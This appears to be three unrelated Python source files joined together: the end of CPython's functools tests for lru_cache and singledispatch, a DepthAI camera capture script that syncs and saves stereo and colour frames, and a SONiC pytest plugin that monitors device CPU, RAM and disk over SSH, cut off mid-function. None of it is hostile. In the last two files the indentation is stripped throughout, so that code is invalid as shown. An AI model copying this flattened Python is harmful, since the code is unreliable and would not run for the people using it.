                self.assertEqual(f(k, 0), orig(k, 0))

        def clear():
            start.wait(10)
            for _ in range(2*m):
                f.cache_clear()

        orig_si = sys.getswitchinterval()
        sys.setswitchinterval(1e-6)
        try:
            # create n threads in order to fill cache
            threads = [threading.Thread(target=full, args=[k])
                       for k in range(n)]
            with support.start_threads(threads):
                start.set()

            hits, misses, maxsize, currsize = f.cache_info()
            if self.module is py_functools:
                # XXX: Why can be not equal?
                self.assertLessEqual(misses, n)
                self.assertLessEqual(hits, m*n - misses)
            else:
                self.assertEqual(misses, n)
                self.assertEqual(hits, m*n - misses)
            self.assertEqual(currsize, n)

            # create n threads in order to fill cache and 1 to clear it
            threads = [threading.Thread(target=clear)]
            threads += [threading.Thread(target=full, args=[k])
                        for k in range(n)]
            start.clear()
            with support.start_threads(threads):
                start.set()
        finally:
            sys.setswitchinterval(orig_si)

    @unittest.skipUnless(threading, 'This test requires threading.')
    def test_lru_cache_threaded2(self):
        # Simultaneous call with the same arguments
        n, m = 5, 7
        start = threading.Barrier(n+1)
        pause = threading.Barrier(n+1)
        stop = threading.Barrier(n+1)
        @self.module.lru_cache(maxsize=m*n)
        def f(x):
            pause.wait(10)
            return 3 * x
        self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
        def test():
            for i in range(m):
                start.wait(10)
                self.assertEqual(f(i), 3 * i)
                stop.wait(10)
        threads = [threading.Thread(target=test) for k in range(n)]
        with support.start_threads(threads):
            for i in range(m):
                start.wait(10)
                stop.reset()
                pause.wait(10)
                start.reset()
                stop.wait(10)
                pause.reset()
                self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))

    def test_need_for_rlock(self):
        # This will deadlock on an LRU cache that uses a regular lock
        @self.module.lru_cache(maxsize=10)
        def test_func(x):
            'Used to demonstrate a reentrant lru_cache call within a single thread'
            return x

        class DoubleEq:
            'Demonstrate a reentrant lru_cache call within a single thread'
            def __init__(self, x):
                self.x = x
            def __hash__(self):
                return self.x
            def __eq__(self, other):
                if self.x == 2:
                    test_func(DoubleEq(1))
                return self.x == other.x

        test_func(DoubleEq(1))                      # Load the cache
        test_func(DoubleEq(2))                      # Load the cache
        self.assertEqual(test_func(DoubleEq(2)),    # Trigger a re-entrant __eq__ call
                         DoubleEq(2))               # Verify the correct return value

    def test_early_detection_of_bad_call(self):
        # Issue #22184
        with self.assertRaises(TypeError):
            @functools.lru_cache
            def f():
                pass

    def test_lru_method(self):
        class X(int):
            f_cnt = 0
            @self.module.lru_cache(2)
            def f(self, x):
                self.f_cnt += 1
                return x*10+self
        a = X(5)
        b = X(5)
        c = X(7)
        self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))

        for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
            self.assertEqual(a.f(x), x*10 + 5)
        self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
        self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))

        for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
            self.assertEqual(b.f(x), x*10 + 5)
        self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
        self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))

        for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
            self.assertEqual(c.f(x), x*10 + 7)
        self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
        self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))

        self.assertEqual(a.f.cache_info(), X.f.cache_info())
        self.assertEqual(b.f.cache_info(), X.f.cache_info())
        self.assertEqual(c.f.cache_info(), X.f.cache_info())


class TestLRUC(TestLRU, unittest.TestCase):
    module = c_functools


class TestLRUPy(TestLRU, unittest.TestCase):
    module = py_functools
class TestSingleDispatch(unittest.TestCase):

    def test_simple_overloads(self):
        @functools.singledispatch
        def g(obj):
            return "base"
        def g_int(i):
            return "integer"
        g.register(int, g_int)
        self.assertEqual(g("str"), "base")
        self.assertEqual(g(1), "integer")
        self.assertEqual(g([1,2,3]), "base")

    def test_mro(self):
        @functools.singledispatch
        def g(obj):
            return "base"
        class A:
            pass
        class C(A):
            pass
        class B(A):
            pass
        class D(C, B):
            pass
        def g_A(a):
            return "A"
        def g_B(b):
            return "B"
        g.register(A, g_A)
        g.register(B, g_B)
        self.assertEqual(g(A()), "A")
        self.assertEqual(g(B()), "B")
        self.assertEqual(g(C()), "A")
        self.assertEqual(g(D()), "B")

    def test_register_decorator(self):
        @functools.singledispatch
        def g(obj):
            return "base"
        @g.register(int)
        def g_int(i):
            return "int %s" % (i,)
        self.assertEqual(g(""), "base")
        self.assertEqual(g(12), "int 12")
        self.assertIs(g.dispatch(int), g_int)
        self.assertIs(g.dispatch(object), g.dispatch(str))
        # Note: in the assert above this is not g.
        # @singledispatch returns the wrapper.

    def test_wrapping_attributes(self):
        @functools.singledispatch
        def g(obj):
            "Simple test"
            return "Test"
        self.assertEqual(g.__name__, "g")
        if sys.flags.optimize < 2:
            self.assertEqual(g.__doc__, "Simple test")

    @unittest.skipUnless(decimal, 'requires _decimal')
    @support.cpython_only
    def test_c_classes(self):
        @functools.singledispatch
        def g(obj):
            return "base"
        @g.register(decimal.DecimalException)
        def _(obj):
            return obj.args
        subn = decimal.Subnormal("Exponent < Emin")
        rnd = decimal.Rounded("Number got rounded")
        self.assertEqual(g(subn), ("Exponent < Emin",))
        self.assertEqual(g(rnd), ("Number got rounded",))
        @g.register(decimal.Subnormal)
        def _(obj):
            return "Too small to care."
        self.assertEqual(g(subn), "Too small to care.")
        self.assertEqual(g(rnd), ("Number got rounded",))

    def test_compose_mro(self):
        # None of the examples in this test depend on haystack ordering.
        c = collections
        mro = functools._compose_mro
        bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
        for haystack in permutations(bases):
            m = mro(dict, haystack)
            self.assertEqual(m, [dict, c.MutableMapping, c.Mapping, c.Sized,
                                 c.Iterable, c.Container, object])
        bases = [c.Container, c.Mapping, c.MutableMapping, c.OrderedDict]
        for haystack in permutations(bases):
            m = mro(c.ChainMap, haystack)
            self.assertEqual(m, [c.ChainMap, c.MutableMapping, c.Mapping,
                                 c.Sized, c.Iterable, c.Container, object])
        # If there's a generic function with implementations registered for
        # both Sized and Container, passing a defaultdict to it results in an
        # ambiguous dispatch which will cause a RuntimeError (see
        # test_mro_conflicts).
        bases = [c.Container, c.Sized, str]
        for haystack in permutations(bases):
            m = mro(c.defaultdict, [c.Sized, c.Container, str])
            self.assertEqual(m, [c.defaultdict, dict, c.Sized, c.Container,
                                 object])
        # MutableSequence below is registered directly on D. In other words, it
        # precedes MutableMapping which means single dispatch will always
        # choose MutableSequence here.
        class D(c.defaultdict):
            pass
        c.MutableSequence.register(D)
        bases = [c.MutableSequence, c.MutableMapping]
        for haystack in permutations(bases):
            m = mro(D, bases)
            self.assertEqual(m, [D, c.MutableSequence, c.Sequence,
                                 c.defaultdict, dict, c.MutableMapping,
                                 c.Mapping, c.Sized, c.Iterable, c.Container,
                                 object])
        # Container and Callable are registered on different base classes and
        # a generic function supporting both should always pick the Callable
        # implementation if a C instance is passed.
        class C(c.defaultdict):
            def __call__(self):
                pass
        bases = [c.Sized, c.Callable, c.Container, c.Mapping]
        for haystack in permutations(bases):
            m = mro(C, haystack)
            self.assertEqual(m, [C, c.Callable, c.defaultdict, dict, c.Mapping,
                                 c.Sized, c.Iterable, c.Container, object])

    def test_register_abc(self):
        c = collections
        d = {"a": "b"}
        l = [1, 2, 3]
        s = {object(), None}
        f = frozenset(s)
        t = (1, 2, 3)
        @functools.singledispatch
        def g(obj):
            return "base"
        self.assertEqual(g(d), "base")
        self.assertEqual(g(l), "base")
        self.assertEqual(g(s), "base")
        self.assertEqual(g(f), "base")
        self.assertEqual(g(t), "base")
        g.register(c.Sized, lambda obj: "sized")
        self.assertEqual(g(d), "sized")
        self.assertEqual(g(l), "sized")
        self.assertEqual(g(s), "sized")
        self.assertEqual(g(f), "sized")
        self.assertEqual(g(t), "sized")
        g.register(c.MutableMapping, lambda obj: "mutablemapping")
        self.assertEqual(g(d), "mutablemapping")
        self.assertEqual(g(l), "sized")
        self.assertEqual(g(s), "sized")
        self.assertEqual(g(f), "sized")
        self.assertEqual(g(t), "sized")
        g.register(c.ChainMap, lambda obj: "chainmap")
        self.assertEqual(g(d), "mutablemapping")  # irrelevant ABCs registered
        self.assertEqual(g(l), "sized")
        self.assertEqual(g(s), "sized")
        self.assertEqual(g(f), "sized")
        self.assertEqual(g(t), "sized")
        g.register(c.MutableSequence, lambda obj: "mutablesequence")
        self.assertEqual(g(d), "mutablemapping")
        self.assertEqual(g(l), "mutablesequence")
        self.assertEqual(g(s), "sized")
        self.assertEqual(g(f), "sized")
        self.assertEqual(g(t), "sized")
        g.register(c.MutableSet, lambda obj: "mutableset")
        self.assertEqual(g(d), "mutablemapping")
        self.assertEqual(g(l), "mutablesequence")
        self.assertEqual(g(s), "mutableset")
        self.assertEqual(g(f), "sized")
        self.assertEqual(g(t), "sized")
        g.register(c.Mapping, lambda obj: "mapping")
        self.assertEqual(g(d), "mutablemapping")  # not specific enough
        self.assertEqual(g(l), "mutablesequence")
        self.assertEqual(g(s), "mutableset")
        self.assertEqual(g(f), "sized")
        self.assertEqual(g(t), "sized")
        g.register(c.Sequence, lambda obj: "sequence")
        self.assertEqual(g(d), "mutablemapping")
        self.assertEqual(g(l), "mutablesequence")
        self.assertEqual(g(s), "mutableset")
        self.assertEqual(g(f), "sized")
        self.assertEqual(g(t), "sequence")
        g.register(c.Set, lambda obj: "set")
        self.assertEqual(g(d), "mutablemapping")
        self.assertEqual(g(l), "mutablesequence")
        self.assertEqual(g(s), "mutableset")
        self.assertEqual(g(f), "set")
        self.assertEqual(g(t), "sequence")
        g.register(dict, lambda obj: "dict")
        self.assertEqual(g(d), "dict")
        self.assertEqual(g(l), "mutablesequence")
        self.assertEqual(g(s), "mutableset")
        self.assertEqual(g(f), "set")
        self.assertEqual(g(t), "sequence")
        g.register(list, lambda obj: "list")
        self.assertEqual(g(d), "dict")
        self.assertEqual(g(l), "list")
        self.assertEqual(g(s), "mutableset")
        self.assertEqual(g(f), "set")
        self.assertEqual(g(t), "sequence")
        g.register(set, lambda obj: "concrete-set")
        self.assertEqual(g(d), "dict")
        self.assertEqual(g(l), "list")
        self.assertEqual(g(s), "concrete-set")
        self.assertEqual(g(f), "set")
        self.assertEqual(g(t), "sequence")
        g.register(frozenset, lambda obj: "frozen-set")
        self.assertEqual(g(d), "dict")
        self.assertEqual(g(l), "list")
        self.assertEqual(g(s), "concrete-set")
        self.assertEqual(g(f), "frozen-set")
        self.assertEqual(g(t), "sequence")
        g.register(tuple, lambda obj: "tuple")
        self.assertEqual(g(d), "dict")
        self.assertEqual(g(l), "list")
        self.assertEqual(g(s), "concrete-set")
        self.assertEqual(g(f), "frozen-set")
        self.assertEqual(g(t), "tuple")

    def test_c3_abc(self):
        c = collections
        mro = functools._c3_mro
        class A(object):
            pass
        class B(A):
            def __len__(self):
                return 0   # implies Sized
        @c.Container.register
        class C(object):
            pass
        class D(object):
            pass   # unrelated
        class X(D, C, B):
            def __call__(self):
                pass   # implies Callable
        expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
        for abcs in permutations([c.Sized, c.Callable, c.Container]):
            self.assertEqual(mro(X, abcs=abcs), expected)
        # unrelated ABCs don't appear in the resulting MRO
        many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
        self.assertEqual(mro(X, abcs=many_abcs), expected)

    def test_mro_conflicts(self):
        c = collections
        @functools.singledispatch
        def g(arg):
            return "base"
        class O(c.Sized):
            def __len__(self):
                return 0
        o = O()
        self.assertEqual(g(o), "base")
        g.register(c.Iterable, lambda arg: "iterable")
        g.register(c.Container, lambda arg: "container")
        g.register(c.Sized, lambda arg: "sized")
        g.register(c.Set, lambda arg: "set")
        self.assertEqual(g(o), "sized")
        c.Iterable.register(O)
        self.assertEqual(g(o), "sized")   # because it's explicitly in __mro__
        c.Container.register(O)
        self.assertEqual(g(o), "sized")   # see above: Sized is in __mro__
        c.Set.register(O)
        self.assertEqual(g(o), "set")     # because c.Set is a subclass of
                                          # c.Sized and c.Container
        class P:
            pass
        p = P()
        self.assertEqual(g(p), "base")
        c.Iterable.register(P)
        self.assertEqual(g(p), "iterable")
        c.Container.register(P)
        with self.assertRaises(RuntimeError) as re_one:
            g(p)
        self.assertIn(
            str(re_one.exception),
            (("Ambiguous dispatch: <class 'collections.abc.Container'> "
              "or <class 'collections.abc.Iterable'>"),
             ("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
              "or <class 'collections.abc.Container'>")),
        )
        class Q(c.Sized):
            def __len__(self):
                return 0
        q = Q()
        self.assertEqual(g(q), "sized")
        c.Iterable.register(Q)
        self.assertEqual(g(q), "sized")   # because it's explicitly in __mro__
        c.Set.register(Q)
        self.assertEqual(g(q), "set")     # because c.Set is a subclass of
                                          # c.Sized and c.Iterable
        @functools.singledispatch
        def h(arg):
            return "base"
        @h.register(c.Sized)
        def _(arg):
            return "sized"
        @h.register(c.Container)
        def _(arg):
            return "container"
        # Even though Sized and Container are explicit bases of MutableMapping,
        # this ABC is implicitly registered on defaultdict which makes all of
        # MutableMapping's bases implicit as well from defaultdict's
        # perspective.
        with self.assertRaises(RuntimeError) as re_two:
            h(c.defaultdict(lambda: 0))
        self.assertIn(
            str(re_two.exception),
            (("Ambiguous dispatch: <class 'collections.abc.Container'> "
              "or <class 'collections.abc.Sized'>"),
             ("Ambiguous dispatch: <class 'collections.abc.Sized'> "
              "or <class 'collections.abc.Container'>")),
        )
        class R(c.defaultdict):
            pass
        c.MutableSequence.register(R)
        @functools.singledispatch
        def i(arg):
            return "base"
        @i.register(c.MutableMapping)
        def _(arg):
            return "mapping"
        @i.register(c.MutableSequence)
        def _(arg):
            return "sequence"
        r = R()
        self.assertEqual(i(r), "sequence")
        class S:
            pass
        class T(S, c.Sized):
            def __len__(self):
                return 0
        t = T()
        self.assertEqual(h(t), "sized")
        c.Container.register(T)
        self.assertEqual(h(t), "sized")   # because it's explicitly in the MRO
        class U:
            def __len__(self):
                return 0
        u = U()
        self.assertEqual(h(u), "sized")   # implicit Sized subclass inferred
                                          # from the existence of __len__()
        c.Container.register(U)
        # There is no preference for registered versus inferred ABCs.
        with self.assertRaises(RuntimeError) as re_three:
            h(u)
        self.assertIn(
            str(re_three.exception),
            (("Ambiguous dispatch: <class 'collections.abc.Container'> "
              "or <class 'collections.abc.Sized'>"),
             ("Ambiguous dispatch: <class 'collections.abc.Sized'> "
              "or <class 'collections.abc.Container'>")),
        )
        class V(c.Sized, S):
            def __len__(self):
                return 0
        @functools.singledispatch
        def j(arg):
            return "base"
        @j.register(S)
        def _(arg):
            return "s"
        @j.register(c.Container)
        def _(arg):
            return "container"
        v = V()
        self.assertEqual(j(v), "s")
        c.Container.register(V)
        self.assertEqual(j(v), "container")   # because it ends up right after
                                              # Sized in the MRO

    def test_cache_invalidation(self):
        from collections import UserDict
        class TracingDict(UserDict):
            def __init__(self, *args, **kwargs):
                super(TracingDict, self).__init__(*args, **kwargs)
                self.set_ops = []
                self.get_ops = []
            def __getitem__(self, key):
                result = self.data[key]
                self.get_ops.append(key)
                return result
            def __setitem__(self, key, value):
                self.set_ops.append(key)
                self.data[key] = value
            def clear(self):
                self.data.clear()
        _orig_wkd = functools.WeakKeyDictionary
        td = TracingDict()
        functools.WeakKeyDictionary = lambda: td
        c = collections
        @functools.singledispatch
        def g(arg):
            return "base"
        d = {}
        l = []
        self.assertEqual(len(td), 0)
        self.assertEqual(g(d), "base")
        self.assertEqual(len(td), 1)
        self.assertEqual(td.get_ops, [])
        self.assertEqual(td.set_ops, [dict])
        self.assertEqual(td.data[dict], g.registry[object])
        self.assertEqual(g(l), "base")
        self.assertEqual(len(td), 2)
        self.assertEqual(td.get_ops, [])
        self.assertEqual(td.set_ops, [dict, list])
        self.assertEqual(td.data[dict], g.registry[object])
        self.assertEqual(td.data[list], g.registry[object])
        self.assertEqual(td.data[dict], td.data[list])
        self.assertEqual(g(l), "base")
        self.assertEqual(g(d), "base")
        self.assertEqual(td.get_ops, [list, dict])
        self.assertEqual(td.set_ops, [dict, list])
        g.register(list, lambda arg: "list")
        self.assertEqual(td.get_ops, [list, dict])
        self.assertEqual(len(td), 0)
        self.assertEqual(g(d), "base")
        self.assertEqual(len(td), 1)
        self.assertEqual(td.get_ops, [list, dict])
        self.assertEqual(td.set_ops, [dict, list, dict])
        self.assertEqual(td.data[dict],
                         functools._find_impl(dict, g.registry))
        self.assertEqual(g(l), "list")
        self.assertEqual(len(td), 2)
        self.assertEqual(td.get_ops, [list, dict])
        self.assertEqual(td.set_ops, [dict, list, dict, list])
        self.assertEqual(td.data[list],
                         functools._find_impl(list, g.registry))
        class X:
            pass
        c.MutableMapping.register(X)   # Will not invalidate the cache,
                                       # not using ABCs yet.
        self.assertEqual(g(d), "base")
        self.assertEqual(g(l), "list")
        self.assertEqual(td.get_ops, [list, dict, dict, list])
        self.assertEqual(td.set_ops, [dict, list, dict, list])
        g.register(c.Sized, lambda arg: "sized")
        self.assertEqual(len(td), 0)
        self.assertEqual(g(d), "sized")
        self.assertEqual(len(td), 1)
        self.assertEqual(td.get_ops, [list, dict, dict, list])
        self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
        self.assertEqual(g(l), "list")
        self.assertEqual(len(td), 2)
        self.assertEqual(td.get_ops, [list, dict, dict, list])
        self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
        self.assertEqual(g(l), "list")
        self.assertEqual(g(d), "sized")
        self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
        self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
        g.dispatch(list)
        g.dispatch(dict)
        self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
                                      list, dict])
        self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
        c.MutableSet.register(X)       # Will invalidate the cache.
        self.assertEqual(len(td), 2)   # Stale cache.
        self.assertEqual(g(l), "list")
        self.assertEqual(len(td), 1)
        g.register(c.MutableMapping, lambda arg: "mutablemapping")
        self.assertEqual(len(td), 0)
        self.assertEqual(g(d), "mutablemapping")
        self.assertEqual(len(td), 1)
        self.assertEqual(g(l), "list")
        self.assertEqual(len(td), 2)
        g.register(dict, lambda arg: "dict")
        self.assertEqual(g(d), "dict")
        self.assertEqual(g(l), "list")
        g._clear_cache()
        self.assertEqual(len(td), 0)
        functools.WeakKeyDictionary = _orig_wkd


if __name__ == '__main__':
    unittest.main()
|
main.py
|
#!/usr/bin/env python3
import argparse
from pathlib import Path
from time import monotonic
from uuid import uuid4
from multiprocessing import Process, Queue
import cv2
import depthai as dai
def check_range(min_val, max_val):
def check_fn(value):
ivalue = int(value)
if min_val <= ivalue <= max_val:
return ivalue
else:
raise argparse.ArgumentTypeError(
"{} is an invalid int value, must be in range {}..{}".format(value, min_val, max_val)
)
return check_fn
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--threshold', default=0.3, type=float, help="Maximum difference between packet timestamps to be considered as synced")
parser.add_argument('-p', '--path', default="data", type=str, help="Path where to store the captured data")
parser.add_argument('-d', '--dirty', action='store_true', default=False, help="Allow the destination path not to be empty")
parser.add_argument('-nd', '--no-debug', dest="prod", action='store_true', default=False, help="Do not display debug output")
parser.add_argument('-m', '--time', type=float, default=float("inf"), help="Finish execution after X seconds")
parser.add_argument('-af', '--autofocus', type=str, default=None, help="Set AutoFocus mode of the RGB camera", choices=list(filter(lambda name: name[0].isupper(), vars(dai.CameraControl.AutoFocusMode))))
parser.add_argument('-mf', '--manualfocus', type=check_range(0, 255), help="Set manual focus of the RGB camera [0..255]")
parser.add_argument('-et', '--exposure-time', type=check_range(1, 33000), help="Set manual exposure time of the RGB camera [1..33000]")
parser.add_argument('-ei', '--exposure-iso', type=check_range(100, 1600), help="Set manual exposure ISO of the RGB camera [100..1600]")
args = parser.parse_args()
exposure = [args.exposure_time, args.exposure_iso]
if any(exposure) and not all(exposure):
raise RuntimeError("Both --exposure-time and --exposure-iso needs to be provided")
dest = Path(args.path).resolve().absolute()
dest_count = len(list(dest.glob('*')))
if dest.exists() and dest_count != 0 and not args.dirty:
raise ValueError(f"Path {dest} contains {dest_count} files. Either specify new path or use \"--dirty\" flag to use current one")
dest.mkdir(parents=True, exist_ok=True)
def create_pipeline(depth_enabled=True):
pipeline = dai.Pipeline()
rgb = pipeline.createColorCamera()
rgb.setPreviewSize(300, 300)
rgb.setBoardSocket(dai.CameraBoardSocket.RGB)
rgb.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
rgb.setInterleaved(False)
rgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.RGB)
controlIn = pipeline.createXLinkIn()
controlIn.setStreamName('control')
controlIn.out.link(rgb.inputControl)
rgbOut = pipeline.createXLinkOut()
rgbOut.setStreamName("color")
rgb.preview.link(rgbOut.input)
if depth_enabled:
left = pipeline.createMonoCamera()
left.setResolution(dai.MonoCameraProperties.SensorResolution.THE_400_P)
left.setBoardSocket(dai.CameraBoardSocket.LEFT)
right = pipeline.createMonoCamera()
right.setResolution(dai.MonoCameraProperties.SensorResolution.THE_400_P)
right.setBoardSocket(dai.CameraBoardSocket.RIGHT)
depth = pipeline.createStereoDepth()
depth.initialConfig.setConfidenceThreshold(255)
median = dai.StereoDepthProperties.MedianFilter.KERNEL_7x7
depth.initialConfig.setMedianFilter(median)
depth.setLeftRightCheck(False)
depth.setExtendedDisparity(False)
depth.setSubpixel(False)
left.out.link(depth.left)
right.out.link(depth.right)
# Create output
leftOut = pipeline.createXLinkOut()
leftOut.setStreamName("left")
left.out.link(leftOut.input)
rightOut = pipeline.createXLinkOut()
rightOut.setStreamName("right")
right.out.link(rightOut.input)
depthOut = pipeline.createXLinkOut()
depthOut.setStreamName("disparity")
depth.disparity.link(depthOut.input)
return pipeline
# https://stackoverflow.com/a/7859208/5494277
def step_norm(value):
return round(value / args.threshold) * args.threshold
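# step_norm() buckets a timestamp to the nearest multiple of the sync
# threshold, e.g. with the default --threshold 0.3 both 1.40 s and 1.55 s
# land in the same 1.5 s bucket, so packets captured close together in time
# share a pairing key.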
def seq(packet):
return packet.getSequenceNum()
def tst(packet):
return packet.getTimestamp().total_seconds()
# https://stackoverflow.com/a/10995203/5494277
def has_keys(obj, keys):
return all(stream in obj for stream in keys)
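# PairingSystem collects packets until a complete set is available: the
# mono/depth streams are matched by sequence number, the color stream by
# bucketed timestamp (with the "left" stream acting as the
# sequence-to-timestamp reference), and anything older than the last
# completed pair is garbage-collected.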
class PairingSystem:
seq_streams = ["left", "right", "disparity"]
ts_streams = ["color"]
seq_ts_mapping_stream = "left"
def __init__(self):
self.ts_packets = {}
self.seq_packets = {}
self.last_paired_ts = None
self.last_paired_seq = None
def add_packets(self, packets, stream_name):
if packets is None:
return
if stream_name in self.seq_streams:
for packet in packets:
seq_key = seq(packet)
self.seq_packets[seq_key] = {
**self.seq_packets.get(seq_key, {}),
stream_name: packet
}
elif stream_name in self.ts_streams:
for packet in packets:
ts_key = step_norm(tst(packet))
self.ts_packets[ts_key] = {
**self.ts_packets.get(ts_key, {}),
stream_name: packet
}
def get_pairs(self):
results = []
for key in list(self.seq_packets.keys()):
if has_keys(self.seq_packets[key], self.seq_streams):
ts_key = step_norm(tst(self.seq_packets[key][self.seq_ts_mapping_stream]))
if ts_key in self.ts_packets and has_keys(self.ts_packets[ts_key], self.ts_streams):
results.append({
**self.seq_packets[key],
**self.ts_packets[ts_key]
})
self.last_paired_seq = key
self.last_paired_ts = ts_key
if len(results) > 0:
self.collect_garbage()
return results
def collect_garbage(self):
for key in list(self.seq_packets.keys()):
if key <= self.last_paired_seq:
del self.seq_packets[key]
for key in list(self.ts_packets.keys()):
if key <= self.last_paired_ts:
del self.ts_packets[key]
extract_frame = {
"left": lambda item: item.getCvFrame(),
"right": lambda item: item.getCvFrame(),
"color": lambda item: item.getCvFrame(),
"disparity": lambda item: cv2.applyColorMap(item.getFrame(), cv2.COLORMAP_JET),
}
def store_frames(in_q):
while True:
frames_dict = in_q.get()
if frames_dict is None:
return
frames_path = dest / Path(str(uuid4()))
frames_path.mkdir(parents=False, exist_ok=False)
for stream_name, item in frames_dict.items():
cv2.imwrite(str(frames_path / Path(f"{stream_name}.png")), item)
def main():
frame_q = Queue(50)
store_p = Process(target=store_frames, args=(frame_q, ))
store_p.start()
try:
        # Pipeline defined, now connect to the device
with dai.Device() as device:
cams = device.getConnectedCameras()
depth_enabled = dai.CameraBoardSocket.LEFT in cams and dai.CameraBoardSocket.RIGHT in cams
ps = None
if depth_enabled:
ps = PairingSystem()
else:
PairingSystem.seq_streams = []
device.startPipeline(create_pipeline(depth_enabled))
qControl = device.getInputQueue('control')
ctrl = dai.CameraControl()
if args.autofocus:
ctrl.setAutoFocusMode(getattr(dai.CameraControl.AutoFocusMode, args.autofocus))
if args.manualfocus:
ctrl.setManualFocus(args.manualfocus)
if all(exposure):
ctrl.setManualExposure(*exposure)
qControl.send(ctrl)
start_ts = monotonic()
while True:
for queueName in PairingSystem.seq_streams + PairingSystem.ts_streams:
packets = device.getOutputQueue(queueName).tryGetAll()
if ps is not None:
ps.add_packets(packets, queueName)
elif queueName == "color":
for packet in packets:
frame_q.put({"color": extract_frame[queueName](packet)})
if queueName == "color" and len(packets) > 0 and not args.prod:
cv2.imshow("preview", packets[-1].getCvFrame())
if ps is not None:
pairs = ps.get_pairs()
for pair in pairs:
extracted_pair = {stream_name: extract_frame[stream_name](item) for stream_name, item in pair.items()}
if not args.prod:
for stream_name, item in extracted_pair.items():
cv2.imshow(stream_name, item)
frame_q.put(extracted_pair)
if not args.prod and cv2.waitKey(1) == ord('q'):
break
if monotonic() - start_ts > args.time:
break
finally:
frame_q.put(None)
store_p.join()
if __name__ == "__main__":
main()
|
pytest_dut_monitor.py
|
import pytest
import paramiko
import threading
import logging
import time
import os
import yaml
from collections import OrderedDict
from datetime import datetime
from .errors import HDDThresholdExceeded, RAMThresholdExceeded, CPUThresholdExceeded
logger = logging.getLogger(__name__)
DUT_MONITOR = "/tmp/dut_monitor.py"
DUT_CPU_LOG = "/tmp/cpu.log"
DUT_RAM_LOG = "/tmp/ram.log"
DUT_HDD_LOG = "/tmp/hdd.log"
class DUTMonitorPlugin(object):
"""
Pytest plugin which defines:
- pytest fixtures: 'dut_ssh' and 'dut_monitor'
    - handlers to verify that the CPU, RAM and HDD values measured during each test item
      execution do not exceed the defined thresholds
"""
def __init__(self, thresholds):
self.thresholds = thresholds
@pytest.fixture(autouse=True, scope="module")
def dut_ssh(self, duthosts, rand_one_dut_hostname, creds):
"""Establish SSH connection with DUT"""
duthost = duthosts[rand_one_dut_hostname]
ssh = DUTMonitorClient(host=duthost.hostname, user=creds["sonicadmin_user"],
password=creds["sonicadmin_password"])
yield ssh
@pytest.fixture(autouse=True, scope="function")
def dut_monitor(self, dut_ssh, localhost, duthosts, rand_one_dut_hostname):
"""
        Start monitoring of hardware resource consumption on the DUT for each test item
"""
duthost = duthosts[rand_one_dut_hostname]
dut_thresholds = {}
monitor_exceptions = []
# Start monitoring on DUT
dut_ssh.start()
# Read file with defined thresholds
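        # The lookup below assumes a layout roughly like the following
        # (illustrative sketch only; the platform/hwsku names are hypothetical):
        #
        #   default:
        #     cpu_total: 90
        #     ram_peak: 80
        #     hdd_used: 90
        #   x86_64-example_platform:
        #     default:
        #       ram_peak: 85
        #     hwsku:
        #       Example-HwSku:
        #         cpu_total: 95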
with open(self.thresholds) as stream:
general_thresholds = yaml.safe_load(stream)
dut_thresholds = general_thresholds["default"]
dut_platform = duthost.facts["platform"]
dut_hwsku = duthost.facts["hwsku"]
if dut_platform in general_thresholds:
dut_thresholds.update(general_thresholds[dut_platform]["default"])
if dut_hwsku in general_thresholds[dut_platform]["hwsku"]:
dut_thresholds.update(general_thresholds[dut_platform]["hwsku"][dut_hwsku])
yield dut_thresholds
# Stop monitoring on DUT
dut_ssh.stop()
# Download log files with CPU, RAM and HDD measurements data
measurements = dut_ssh.get_log_files()
# Verify hardware resources consumption does not exceed defined threshold
if measurements["hdd"]:
try:
                self.assert_hdd(hdd_meas=measurements["hdd"], thresholds=dut_thresholds)
except HDDThresholdExceeded as err:
monitor_exceptions.append(err)
if measurements["ram"]:
try:
self.assert_ram(ram_meas=measurements["ram"], thresholds=dut_thresholds)
except RAMThresholdExceeded as err:
monitor_exceptions.append(err)
if measurements["cpu"]:
try:
self.assert_cpu(cpu_meas=measurements["cpu"], thresholds=dut_thresholds)
except CPUThresholdExceeded as err:
monitor_exceptions.append(err)
if monitor_exceptions:
raise Exception("\n".join(item.message for item in monitor_exceptions))
    def assert_hdd(self, hdd_meas, thresholds):
        """
        Verify that HDD resources on the DUT are not overutilized
        """
overused = []
fail_msg = "Used HDD threshold - {}\nHDD overuse:\n".format(thresholds["hdd_used"])
for timestamp, used_hdd in hdd_meas.items():
if used_hdd > thresholds["hdd_used"]:
overused.append((timestamp, used_hdd))
if overused:
raise HDDThresholdExceeded(fail_msg + "\n".join(str(item) for item in overused))
def assert_ram(self, ram_meas, thresholds):
"""
Verify that RAM resources on the DUT are not overutilized
"""
failed = False
peak_overused = []
fail_msg = "\nRAM thresholds: peak - {}; before/after test difference - {}%\n".format(thresholds["ram_peak"],
thresholds["ram_delta"])
for timestamp, used_ram in ram_meas.items():
if used_ram > thresholds["ram_peak"]:
peak_overused.append((timestamp, used_ram))
if peak_overused:
fail_msg = fail_msg + "RAM overuse:\n{}\n".format("\n".join(str(item) for item in peak_overused))
failed = True
        # Take the first and last RAM measurements
        if len(ram_meas) >= 4:
            before = sum(list(ram_meas.values())[0:2]) / 2
